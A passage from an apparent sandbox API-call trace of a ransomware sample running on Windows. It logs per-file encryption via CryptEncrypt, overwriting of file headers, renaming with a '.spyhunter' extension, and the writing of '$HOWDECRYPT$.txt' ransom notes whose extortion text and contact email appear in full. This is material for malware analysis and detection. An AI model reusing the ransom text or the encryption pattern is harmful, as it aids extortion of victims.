RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x335d88 [0084.459] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x335d88*, pdwDataLen=0x57fef0*=0x20, dwBufLen=0x30 | out: pbData=0x335d88*, pdwDataLen=0x57fef0*=0x30) returned 1 [0084.459] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0084.538] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 89 [0084.538] StrStrW (lpFirst="AccLR.cab", lpSrch=".txt") returned 0x0 [0084.538] GetProcessHeap () returned 0x2c0000 [0084.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x341830 [0084.538] ReadFile (in: hFile=0x138, lpBuffer=0x341830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57feb4, lpOverlapped=0x0 | out: lpBuffer=0x341830*, lpNumberOfBytesRead=0x57feb4*=0x2800, lpOverlapped=0x0) returned 1 [0084.612] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.612] WriteFile (in: hFile=0x138, lpBuffer=0x341830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57feb4, lpOverlapped=0x0 | out: lpBuffer=0x341830*, lpNumberOfBytesWritten=0x57feb4*=0x2800, lpOverlapped=0x0) returned 1 [0084.612] GetProcessHeap () returned 0x2c0000 [0084.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x341830 | out: hHeap=0x2c0000) returned 1 [0084.612] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.612] WriteFile (in: hFile=0x138, lpBuffer=0x57fef4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57feb4, lpOverlapped=0x0 | out: lpBuffer=0x57fef4*, lpNumberOfBytesWritten=0x57feb4*=0x4, lpOverlapped=0x0) returned 1 [0084.771] WriteFile (in: hFile=0x138, lpBuffer=0x335d88*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57feb4, lpOverlapped=0x0 | out: lpBuffer=0x335d88*, lpNumberOfBytesWritten=0x57feb4*=0x30, lpOverlapped=0x0) returned 1 [0084.772] CloseHandle (hObject=0x138) returned 1 [0085.609] GetProcessHeap () returned 0x2c0000 [0085.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0085.609] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.spyhunter") returned 99 [0085.609] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.spyhunter")) returned 1 [0085.620] GetProcessHeap () returned 0x2c0000 [0085.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0085.620] GetProcessHeap () returned 0x2c0000 [0085.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x335d88 | out: hHeap=0x2c0000) returned 1 [0085.620] GetProcessHeap () returned 0x2c0000 [0085.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x330b20 | out: hHeap=0x2c0000) returned 1 [0085.621] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0085.621] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0085.621] WriteFile (in: hFile=0x138, lpBuffer=0x57fe27*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ff50, lpOverlapped=0x0 | out: lpBuffer=0x57fe27*, lpNumberOfBytesWritten=0x57ff50*=0x127, lpOverlapped=0x0) returned 1 [0085.622] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0085.622] WriteFile (in: hFile=0x138, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ff50, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ff50*=0x2ac, lpOverlapped=0x0) returned 1 [0085.622] CloseHandle (hObject=0x138) returned 1 [0085.622] GetProcessHeap () returned 0x2c0000 [0085.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3307a0 | out: hHeap=0x2c0000) returned 1 [0085.623] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fef0 | out: pbBuffer=0x57fef0) returned 1 [0085.623] GetProcessHeap () returned 0x2c0000 [0085.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x335d88 [0085.623] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x335d88*, pdwDataLen=0x57fee8*=0x20, dwBufLen=0x30 | out: pbData=0x335d88*, pdwDataLen=0x57fee8*=0x30) returned 1 [0085.623] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.770] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 70 [0085.770] StrStrW (lpFirst="VISFILT.DLL", lpSrch=".txt") returned 0x0 [0085.770] GetProcessHeap () returned 0x2c0000 [0085.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x3468c0 [0085.770] ReadFile (in: hFile=0x158, lpBuffer=0x3468c0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57feac, lpOverlapped=0x0 | out: lpBuffer=0x3468c0*, lpNumberOfBytesRead=0x57feac*=0x2800, lpOverlapped=0x0) returned 1 [0086.054] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.054] WriteFile (in: hFile=0x158, lpBuffer=0x3468c0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57feac, lpOverlapped=0x0 | out: lpBuffer=0x3468c0*, lpNumberOfBytesWritten=0x57feac*=0x2800, lpOverlapped=0x0) returned 1 [0086.054] GetProcessHeap () returned 0x2c0000 [0086.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3468c0 | out: hHeap=0x2c0000) returned 1 [0086.054] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.054] WriteFile (in: hFile=0x158, lpBuffer=0x57feec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57feac, lpOverlapped=0x0 | out: lpBuffer=0x57feec*, lpNumberOfBytesWritten=0x57feac*=0x4, lpOverlapped=0x0) returned 1 [0086.343] WriteFile (in: hFile=0x158, lpBuffer=0x335d88*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57feac, lpOverlapped=0x0 | out: lpBuffer=0x335d88*, lpNumberOfBytesWritten=0x57feac*=0x30, lpOverlapped=0x0) returned 1 [0086.343] CloseHandle (hObject=0x158) returned 1 [0086.845] GetProcessHeap () returned 0x2c0000 [0086.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x387090 [0086.845] wnsprintfW (in: pszDest=0x387090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.spyhunter") returned 80 [0086.845] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.spyhunter")) returned 1 [0086.845] GetProcessHeap () returned 0x2c0000 [0086.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x387090 | out: hHeap=0x2c0000) returned 1 [0086.845] GetProcessHeap () returned 0x2c0000 [0086.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x335d88 | out: hHeap=0x2c0000) returned 1 [0086.845] GetProcessHeap () returned 0x2c0000 [0086.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x324638 | out: hHeap=0x2c0000) returned 1 [0086.845] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fee8 | out: pbBuffer=0x57fee8) returned 1 [0086.845] GetProcessHeap () returned 0x2c0000 [0086.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0086.845] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fee0*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fee0*=0x30) returned 1 [0086.846] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.864] GetProcessHeap () returned 0x2c0000 [0086.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0086.864] GetProcessHeap () returned 0x2c0000 [0086.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x370ba0 | out: hHeap=0x2c0000) returned 1 [0086.864] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fee8 | out: pbBuffer=0x57fee8) returned 1 [0086.864] GetProcessHeap () returned 0x2c0000 [0086.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0086.864] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fee0*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fee0*=0x30) returned 1 [0086.864] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.866] GetProcessHeap () returned 0x2c0000 [0086.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0086.866] GetProcessHeap () returned 0x2c0000 [0086.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x328eb8 | out: hHeap=0x2c0000) returned 1 [0086.866] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fee0 | out: pbBuffer=0x57fee0) returned 1 [0086.866] GetProcessHeap () returned 0x2c0000 [0086.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0086.866] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fed8*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fed8*=0x30) returned 1 [0086.866] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.944] GetProcessHeap () returned 0x2c0000 [0086.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0086.944] GetProcessHeap () returned 0x2c0000 [0086.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x383a50 | out: hHeap=0x2c0000) returned 1 [0086.944] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fee0 | out: pbBuffer=0x57fee0) returned 1 [0086.944] GetProcessHeap () returned 0x2c0000 [0086.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0086.944] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fed8*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fed8*=0x30) returned 1 [0086.944] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.972] GetProcessHeap () returned 0x2c0000 [0086.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0086.972] GetProcessHeap () returned 0x2c0000 [0086.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3593e0 | out: hHeap=0x2c0000) returned 1 [0086.972] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fed8 | out: pbBuffer=0x57fed8) returned 1 [0086.972] GetProcessHeap () returned 0x2c0000 [0086.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0086.972] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fed0*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fed0*=0x30) returned 1 [0086.972] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.046] GetProcessHeap () returned 0x2c0000 [0087.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.046] GetProcessHeap () returned 0x2c0000 [0087.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3590a0 | out: hHeap=0x2c0000) returned 1 [0087.046] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fed8 | out: pbBuffer=0x57fed8) returned 1 [0087.046] GetProcessHeap () returned 0x2c0000 [0087.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.046] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fed0*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fed0*=0x30) returned 1 [0087.046] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.092] GetProcessHeap () returned 0x2c0000 [0087.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.095] GetProcessHeap () returned 0x2c0000 [0087.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358c90 | out: hHeap=0x2c0000) returned 1 [0087.095] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fed0 | out: pbBuffer=0x57fed0) returned 1 [0087.095] GetProcessHeap () returned 0x2c0000 [0087.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.096] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fec8*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fec8*=0x30) returned 1 [0087.096] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.244] GetProcessHeap () returned 0x2c0000 [0087.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.244] GetProcessHeap () returned 0x2c0000 [0087.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358540 | out: hHeap=0x2c0000) returned 1 [0087.244] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0087.245] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.245] WriteFile (in: hFile=0x15c, lpBuffer=0x57fe03*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ff2c, lpOverlapped=0x0 | out: lpBuffer=0x57fe03*, lpNumberOfBytesWritten=0x57ff2c*=0x127, lpOverlapped=0x0) returned 1 [0087.246] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.246] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ff2c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ff2c*=0x2ac, lpOverlapped=0x0) returned 1 [0087.246] CloseHandle (hObject=0x15c) returned 1 [0087.246] GetProcessHeap () returned 0x2c0000 [0087.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x353830 | out: hHeap=0x2c0000) returned 1 [0087.246] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fec8 | out: pbBuffer=0x57fec8) returned 1 [0087.246] GetProcessHeap () returned 0x2c0000 [0087.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.246] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fec0*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fec0*=0x30) returned 1 [0087.246] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.331] GetProcessHeap () returned 0x2c0000 [0087.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.331] GetProcessHeap () returned 0x2c0000 [0087.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846a0 | out: hHeap=0x2c0000) returned 1 [0087.332] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0087.332] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.332] WriteFile (in: hFile=0xcc, lpBuffer=0x57fdfb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ff24, lpOverlapped=0x0 | out: lpBuffer=0x57fdfb*, lpNumberOfBytesWritten=0x57ff24*=0x127, lpOverlapped=0x0) returned 1 [0087.333] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.333] WriteFile (in: hFile=0xcc, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ff24, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ff24*=0x2ac, lpOverlapped=0x0) returned 1 [0087.333] CloseHandle (hObject=0xcc) returned 1 [0087.334] GetProcessHeap () returned 0x2c0000 [0087.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x374130 | out: hHeap=0x2c0000) returned 1 [0087.334] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fec0 | out: pbBuffer=0x57fec0) returned 1 [0087.334] GetProcessHeap () returned 0x2c0000 [0087.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.334] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57feb8*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57feb8*=0x30) returned 1 [0087.334] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 